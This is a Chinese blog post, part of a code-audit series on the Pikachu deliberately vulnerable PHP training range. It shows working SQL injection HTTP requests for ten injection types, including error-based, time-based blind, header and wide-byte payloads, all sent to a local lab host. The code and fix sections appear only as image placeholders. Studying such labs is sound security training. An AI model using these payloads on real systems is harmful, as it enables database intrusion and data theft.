2、皮卡丘代码审计(2)

最新推荐文章于 2024-08-13 14:54:57 发布
最新推荐文章于 2024-08-13 14:54:57 发布
阅读量324 收藏 7
点赞数 6
分类专栏: php代码审计(一) 文章标签: php 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YINZHE_/article/details/136413225
版权

sql注入

1、数字型注入

限制

submit参数必须存在

复现

POST /vul/sqli/sqli_id.php HTTP/1.1
Host: bbb.com:8882
Content-Length: 114
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bbb.com:8882
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_id.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close

id=1 AND GTID_SUBSET(CONCAT(0x7176787a71,(SELECT (ELT(7937=7937,1))),0x716b6b6271),7937)&submit=%E6%9F%A5%E8%AF%A2

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

2、字符型注入

限制

submit参数必须存在

复现

GET /vul/sqli/sqli_str.php?name=wwss' AND (SELECT 2605 FROM (SELECT(SLEEP(0)))FYCn)%23&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_str.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close

在这里插入图片描述
在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

3、搜索型注入

限制

submit参数必须存在

复现

GET /vul/sqli/sqli_search.php?name=1111' AND (SELECT 3758 FROM (SELECT(SLEEP(5)))DjNH)%23&submit=%E6%90%9C%E7%B4%A2 HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_search.php?name=qqq&submit=%E6%90%9C%E7%B4%A2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close

在这里插入图片描述
在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

4、xx型注入

限制

submit参数必须存在

复现

GET /vul/sqli/sqli_x.php?name=aa') AND (SELECT 1122 FROM (SELECT(SLEEP(5)))Jrjn)-- dgsV&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_x.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close

在这里插入图片描述
在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

5、insert/update注入

限制

submit参数必须存在

复现

POST /vul/sqli/sqli_iu/sqli_edit.php HTTP/1.1
Host: bbb.com:8882
Content-Length: 169
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bbb.com:8882
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_iu/sqli_edit.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close

sex=q' AND EXTRACTVALUE(2280,CONCAT(0x5c,0x7171786a71,(SELECT (ELT(2280=2280,1))),0x716b767671))-- E&phonenum=%27iii&add=iuuu%27and+1%3D1&email=22%40qq.com&submit=submit

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

6、http 头注入

限制

submit参数必须存在

复现

GET /vul/sqli/sqli_header/sqli_header.php HTTP/1.1
Host: bbb.com:8882
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: '||(SELECT 0x66427650 WHERE 6659=6659 AND GTID_SUBSET(CONCAT(0x717a717871,(SELECT (ELT(5655=5655,1))),0x71786b6a71),5655))||'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_header/sqli_header_login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

7、基于boolian的盲注

限制

submit参数必须存在

复现

GET /vul/sqli/sqli_blind_b.php?name=kobe' AND (SELECT 4721 FROM (SELECT(SLEEP(5)))EvmL) AND 'rXhQ'='rXhQ&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_blind_b.php?name=e&submit=%E6%9F%A5%E8%AF%A2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

8、基于时间的盲注

限制

submit参数必须存在

复现

GET /vul/sqli/sqli_blind_t.php?name=yyy' AND (SELECT 3035 FROM (SELECT(SLEEP(5)))canh) AND 'dHLC'='dHLC&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_blind_t.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close

在这里插入图片描述
在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

9、宽字节注入

限制

submit参数必须存在

复现

POST /vul/sqli/sqli_widebyte.php HTTP/1.1
Host: bbb.com:8882
Content-Length: 46
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bbb.com:8882
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_widebyte.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close

name=kobe%bf'or 1=1#&submit=%E6%9F%A5%E8%AF%A2

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

10、delete注入

限制

复现

GET /vul/sqli/sqli_del.php?id=1 or updatexml(1,concat(0x7e, database()),3) HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_del.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close

在这里插入图片描述
在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

YINZHE_
关注
  • 6
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python皮卡丘代码.rar
04-26
2. **面向对象编程**:Python支持面向对象编程,因此在皮卡丘代码中,我们可能会看到类(class)的定义,模拟皮卡丘的属性(如颜色、叫声等)和行为(如移动、攻击等)。这有助于理解面向对象编程的概念和实现。 3....
随便弄的画皮卡丘代码
12-24
python
MyBatis——基础部分
qq_44408913的博客
06-01 172
新手还不知道使用MyBatis进行增删改查?快尽进来看看吧!绝对简单通俗易懂!!!!
急速解决代码扫描Mybatis的SQL注入问题
变个魔术
03-25 1075
在后端代码和数据库中都开启对sql注入的验证,同时用专业的注入工具查找本系统的漏洞进行修复,也可以进行账号诱骗,将一些如“admin”之类的容易受到攻击的用户设置上千位的密码,让攻击者的软件因为解析量大而负载过大,从而耗尽资源而宕机。sql注入见名知意,是指一些非法用户通过将一些特殊字符或者sql语句插入到要提交的表单之中,从而让服务器在不知情的情况下执行恶意的sql命令,从而引发一系列的安全隐患。这就是典型的系统漏洞,因此sql注入对系统的危害是非常大的,做好防止sql注入也是系统必须完善的。
1、皮卡丘代码审计(1)
Yzz_的博客
03-02 360
message不能为空。
3、皮卡丘代码审计(3)
Yzz_的博客
03-02 1025
参考:https://blog.csdn.net/weixin_45663905/article/details/108026223。
生命在于折腾——皮卡丘靶场源码审计(一)
易水哲的博客
09-19 1495
皮卡丘靶场源码审计(一)
生命在于折腾——皮卡丘靶场源码审计(二)
易水哲的博客
09-19 751
皮卡丘靶场源码审计(二)
32_代码审计实施准备工作、代码审计标准、代码审计流程、代码审计方法、代码审计工具、安装与使用RIPS、Seay代码审计工具、Seay的简单使用
weixin_54591045的博客
08-13 460
代码审计实施准备工作、代码审计标准、代码审计流程、代码审计方法、代码审计工具、安装与使用RIPS、Seay代码审计工具、Seay的简单使用
皮卡丘web靶场的搭建介绍
03-15 8209
NCNIPC–皮卡丘web靶场的搭建介绍 书籍中使用皮卡丘web靶场做web漏洞分析,开源源代码链接如下 https://github.com/zhuifengshaonianhanlu/pikachu 一、下载源代码 从互联网上下载源代码到本地,准备下一步搭建 二、搭建靶场 我这里为了方便部署在window 10系统上,使用一种较为快捷的部署方式,使用小皮面板进行快速搭建。 小皮面板安装网址大家可以去百度一下,傻瓜式安装非常方便,也是大家以后进行代码审计要用到的快捷部署工具。 开启小皮的WAMP环境(
pikachu PHP反序列化(皮卡丘漏洞平台通关系列)
箭雨镜屋
01-30 3824
诶嘿,又是一个简单的关卡 1、学习,学习一下 先跟着pikachu简单学习一下什么叫序列化和反序列化: 但其实我已知这里有两个地方写的不对,需要更正一下: (1)序列化结果中的S不是对象名称,而是类名称;同样的,O和S中间的1应该是类名字长度。 (2)几个魔法函数的举例有点让人误会,很容易误以为这些魔法函数都会造成反序列化漏洞,但其实__construct()在unserialize()时并不会被自动调用,这点在之后会进行演示。 总之,序列化是把对象转换为字符串,从而达到传输和存储的目的
皮卡丘2.exe
09-17
皮卡丘2.exe
python皮卡丘代码直接用
10-12
2. **读取皮卡丘图像**:使用PIL的`Image`类可以打开并加载现有的皮卡丘图片,例如: ```python from PIL import Image pikachu = Image.open("pikachu.png") ``` 3. **图像操作**: - **复制**:Python中的...
python皮卡丘Pikachu.py
12-20
python源代码,可直接运行,使用turtle画的皮卡丘
文件上传-.user.ini利用
最新发布
feiwujiushiwo的博客
08-13 184
php.ini是php的全局配置文件,对整个web服务起作用.user.ini和.htaccess都是目录的配置文件.user.ini是用户自定义的php.in理解为包含文件。
zabbix的setup无法进入第二步
houduanq的博客
08-11 465
chmod: 无法访问"/var/lib/php/session": 没有那个文件或目录。
thinkphp漏洞之sql注入漏洞-builder处漏洞
banliyaoguai的博客
08-09 564
这个代码中上面第一个红框将data数组中遍历,然后val中就是data的值,然后看第二个红框三个不同的参数对应不同的处理方式,这三个处理方式都可以进行注入,但是insert方法中会对exp进行过滤如果数据中存在 exp ,则会被替换成 exp空格,所以三种处理方式中选项等于exp的无法使用。这里是接收一个get传参,然后username/a的意思是有username传参username的值就是传参的值没有的话就是默认是a。看一下他的insert这个函数,数据传输是自己写的值。方法来分析并处理数据。
[FSCTF 2023]细狗2.0
2301_81462177的博客
08-09 321
cmd=ls${lFS}-1剁FSS9-后面加个$与{类似,起截断作用,$9是当前系统shel进程第九个参数持有者始终为空字符串。cmd=lsSlFS-l单纯$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名。ca\t/*123*/f* 发现不可以,看题解后发现使用${IFS}绕过。cmd=ls$lFs$9-1 (这里1到9应该都可以)ca\t$IFS/f* 可得flag。尝试输入cat /f*
Python皮卡丘代码
02-19
Python皮卡丘代码是指使用Python语言编写的一个程序,可以在控制台或者图形界面上显示出皮卡丘的图像。这个程序通常使用Python的图形库来实现,比如Tkinter或者Pygame。 以下是一个简单的Python皮卡丘代码示例: `...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值